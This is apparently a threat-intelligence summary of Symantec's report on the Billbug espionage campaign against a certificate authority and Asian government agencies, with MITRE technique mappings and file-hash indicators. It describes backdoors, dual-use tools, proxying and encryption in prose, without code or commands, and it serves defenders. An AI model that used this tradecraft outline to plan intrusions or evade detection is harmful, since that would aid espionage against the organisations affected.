Symantec links a state-sponsored activity to Billbug (aka Thrip/Lotus Blossom), targeting a certificate authority and government/defense agencies across Asia since March 2022. The operation employs dual-use tools and backdoors (Hannotog and Sagerunex), uses Stowaway proxy tooling for C2 over HTTPS, and shows espionage motivations with potential for certificate abuse—though no certificates were compromised according to Symantec. #Billbug #Thrip #Hannotog #Sagerunex #StowawayProxyTool #CertificateAuthority #AsianGovernments
Keypoints
- Billbug (aka Thrip/Lotus Blossom) is linked to a campaign targeting a certificate authority and government/defense agencies in Asia, active since March 2022.
- The attackers appear to gain initial access via public-facing applications and deploy backdoors (Hannotog and Sagerunex) using loaders.
- A wide set of dual-use tools are employed to map networks and exfiltrate data, including AdFind, Winmail, WinRAR, Ping, Tracert, Route, NBTscan, Certutil, and a port scanner.
- The Sagerunex backdoor uses multiple encryption and obfuscation techniques (XOR, AES-256-CBC, RC4) and communicates over encrypted channels to its C2 server.
- Stowaway Proxy Tool is downloaded to enable multi-hop proxying, illustrating use of pentesting tools for intranet access bypass.
- The campaign’s stated motive is espionage/data theft, with victims including a certificate authority and Asian government agencies; Symantec notified the CA but found no evidence of certificate compromise.
- Protection updates and indicators of compromise are provided by Symantec for defense and detection.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The attackers are exploiting public-facing applications to gain initial access to victim networks. ‘There are some indications that the attackers are exploiting public-facing applications to gain initial access to victim networks.’
- [T1069.001] Active Directory Discovery – AdFind is used to query Active Directory to map a network. ‘A publicly available tool that is used to query Active Directory. It has legitimate uses but is widely used by attackers to help map a network.’
- [T1046] Network Service Scanning – Discovery tools (Ping, Tracert, Route, NBTscan, port scanner) are used to map the network and identify reachable paths. ‘A tool that is freely available online that can allow users to determine if a specific location on a network is responding.’
- [T1560.001] Archive Collected Data – WinRAR is used to archive or zip files prior to exfiltration. ‘An archive manager that can be used to archive or zip files – for example, prior to exfiltration.’
- [T1105] Ingress Tool Transfer – Certutil is used to download files and decode information from the network. ‘Microsoft Windows utility that can be used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates.’
- [T1071] Web Protocols – C2 communications over HTTPS with multiple proxy options. ‘In normal mode, the sample will try all the following supported connection modes in this order. In all cases, HTTPS is used, with user agent equal to: Mozilla/5.0 (compatible; MSIE 7.0; Win32).’
- [T1090] Proxy – Stowaway Proxy Tool is used to proxy external traffic through multiple nodes in the intranet. ‘Stowaway is a multi-level proxy tool written in the Go language and intended for use by penetration testers… proxy external traffic to the intranet through multiple nodes.’
- [T1027] Obfuscated/Compressed Files and Information – The Sagerunex communications and payloads are encrypted/opaque (XOR, AES-256-CBC, RC4). ‘The encryption key is hardcoded… The same encryption algorithm is used for network communication.’
Indicators of Compromise
- [File hash] – 072022b54085690001ff9ec546051b2f60564ffbf5b917ac1f5a0e3abe7254a5, 0cc6285d4bfcb5de4ebe58a7eab9b8d25dfcfeb12676b0c084e8705e69f6f281; context: Hashes associated with the campaign’s components and loaders (multiple hashes listed in the article)